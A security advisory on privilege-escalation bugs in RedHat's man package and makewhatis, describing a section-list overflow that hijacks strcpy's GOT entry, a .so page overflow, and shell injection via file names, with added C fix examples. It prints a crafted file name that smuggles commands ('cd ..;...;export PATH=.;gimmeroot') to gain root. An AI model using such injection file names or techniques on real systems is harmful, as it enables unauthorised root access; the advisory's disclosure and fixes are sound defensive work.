COMMAND

    man

SYSTEMS AFFECTED

    man 1.5h10 + man 1.5i-4 (RedHat 7.0, 7.1)

PROBLEM

    zen-parse found the following.  This advisory is also stored, along
    with the exploits, at http://generic.labs.pulltheplug.com/zen/ as
    man.txt.  This is a bug in the man package, not the man-db package.

    Multiple versions of man are affected.  The version numbers given
    are RedHat rpm version numbers.  Just because a version is not
    listed here, it does not mean it is not vulnerable.  The main
    problem, which allows root, is in /usr/sbin/makewhatis.  If a
    version does no checking for shell metacharacters in file names
    used as arguments, it may well be affected.

    man-1.5h1
    =========

        man -S `perl -e 'print ":" x 100'` ls

    will cause a Segmentation fault error, due to incorrect bounds
    checking in the array used to hold the section list.  Stored after
    the tmp_section_list structure are the heads of a couple of linked
    lists, cat_list and man_list, which hold the names of the files
    already shown.

    By using a pointer to strcpy() (the last entry in the GOT) as  the
    'next' pointer,  it is  possible to  overwrite the  address of the
    library  function   'strcpy'  with   a  newly   malloc()ed  string
    containing the  name of  the file  just viewed.   The string  will
    then be executed instead of strcpy.

    (strcpy() is used, because it contains a NULL after it in the GOT,
    which looks to man to mean "This is the tail of the linked  list",
    and because it gets called at the appropriate time.)

    Exploiting this gives you gid man.  (Elevation of gid man ->  root
    dealt with after the next section).
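    The bounds check that the -S handling lacked, as an added example
    (not man's own source; the MAX_SECTIONS capacity and the function
    names are assumptions): every field of the colon-separated list is
    stored until the array is full, and an argument with more fields
    than slots is rejected instead of running over the list heads that
    sit after the array.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SECTIONS 32  /* assumed capacity, last slot reserved for the NULL tail */

/* Free the first n entries and reset the terminator. */
void free_section_list(char *list[], int n)
{
    while (n > 0)
        free(list[--n]);
    list[0] = NULL;
}

/* Split a colon-separated list such as "1:8:3" into `out`, NULL-terminated as
 * man keeps it. Every field counts, empty ones included, so "::" is three.
 * Returns the number stored, or -1 when the argument has more fields than the
 * array can hold: the bounds check whose absence let the tail be overrun. */
int parse_section_list(const char *arg, char *out[MAX_SECTIONS])
{
    int n = 0;
    const char *start = arg;
    for (;;) {
        const char *end = strchr(start, ':');
        size_t len = end ? (size_t)(end - start) : strlen(start);
        if (n >= MAX_SECTIONS - 1 || (out[n] = malloc(len + 1)) == NULL) {
            free_section_list(out, n);      /* reject instead of overflowing */
            return -1;
        }
        memcpy(out[n], start, len);
        out[n][len] = '\0';
        n++;
        if (end == NULL)
            break;
        start = end + 1;
    }
    out[n] = NULL;                          /* tail stays inside the array */
    return n;
}

int main(void)
{
    char *s[MAX_SECTIONS], big[128];
    int n = parse_section_list("1:8:3", s);
    free_section_list(s, n);
    memset(big, ':', 100); big[100] = '\0'; /* the advisory's ":" x 100 argument */
    printf("%d %d\n", n, parse_section_list(big, s)); /* prints "3 -1" */
    return 0;
}
```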

    man-1.5i-4
    ==========
    This version does not have the -S problem.  It does, however, have
    an overflow in the handling of .so (sourced) man pages.  If a
    manpage has

        .so something

    as the first line, ultimate_source() attempts to find the file
    referred to by 'something'.

    If it is compressed, it uses my_popen(), a wrapped version of
    popen() that drops privileges to the user's, to read the contents
    and check that file for a .so line as well.  Under certain
    circumstances the filename will increase in length.

    As there is no checking for the existence of the file other than
    the return value from the popen() call, it is possible, by
    embedding shell metacharacters in the filename to be opened, to
    trick it into thinking it succeeded.

    The same commands that fool it into thinking it succeeded can
    return the name of the next file to look at.  This can be done
    several times, until the overflow has reached the desired point.
    (ultname is 8192 bytes long, but due to the layout of the variables
    in memory, it needs an overflow of more than double that in order
    to affect the list structure used in the previous exploit, which is
    what zen's exploit does.)

    Successful exploitation will result in gid man.

    /usr/sbin/makewhatis
    ====================

        ...
        function readline() {
            if (use_zcat) {
                # pipe_cmd is handed to /bin/sh: an unquoted filename
                # containing ';' or backquotes runs extra commands here
                result = (pipe_cmd | getline);
                if (result < 0) {
                    print "Pipe error: " pipe_cmd " " ERRNO > "/dev/stderr";
                }
        ...
            if (use_zcat) {
                # filename is concatenated into the command line unchecked
                pipe_cmd = "zcat " filename;
        ...

    Imagine a file called:

        "ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;gimmeroot;echo .1.gz"
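    For both the .so handling above and makewhatis the missing check is
    the same: a file name has to be validated before it reaches zcat,
    and it should never be spliced into a shell command line at all.
    The following is an added example, not code from man or makewhatis;
    MAX_NAME, manpage_name_ok() and open_compressed_page() are assumed
    names.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define MAX_NAME 4096  /* assumed bound, well under the 8192-byte ultname */

/* Accept only names built from [A-Za-z0-9._+-/], with no "..", no leading
 * '-', and a bounded length. Shell metacharacters (';', '`', '$', '|', '&',
 * space, newline, ...) all reach the rejection branch. Returns 1 or 0. */
int manpage_name_ok(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len >= MAX_NAME || name[0] == '-' || strstr(name, ".."))
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '+' || c == '-' || c == '/'))
            return 0;
    }
    return 1;
}

/* Open a compressed page through zcat with no shell in between: existence is
 * checked with stat() rather than inferred from popen() succeeding, and the
 * name is a separate argv element, so no part of it is ever parsed by sh.
 * Returns a FILE* on the decompressed stream, or NULL. */
FILE *open_compressed_page(const char *name)
{
    struct stat st;
    int fds[2];
    if (!manpage_name_ok(name) || stat(name, &st) != 0 || !S_ISREG(st.st_mode))
        return NULL;
    if (pipe(fds) != 0)
        return NULL;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return NULL; }
    if (pid == 0) {                      /* child: zcat <name> -> pipe */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execlp("zcat", "zcat", name, (char *)NULL);
        _exit(127);
    }
    close(fds[1]);
    return fdopen(fds[0], "r");          /* parent reads the page from here */
}
```

    The caller still has to waitpid() for the child after closing the
    stream, as my_popen()'s pclose counterpart would.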

    Mimed exploits (base64 attachments): man-15first.gz, man-15second.gz

SOLUTION

    For more info:

        http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=19351
        https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=40400
        https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=41805
        https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=42450
        http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43213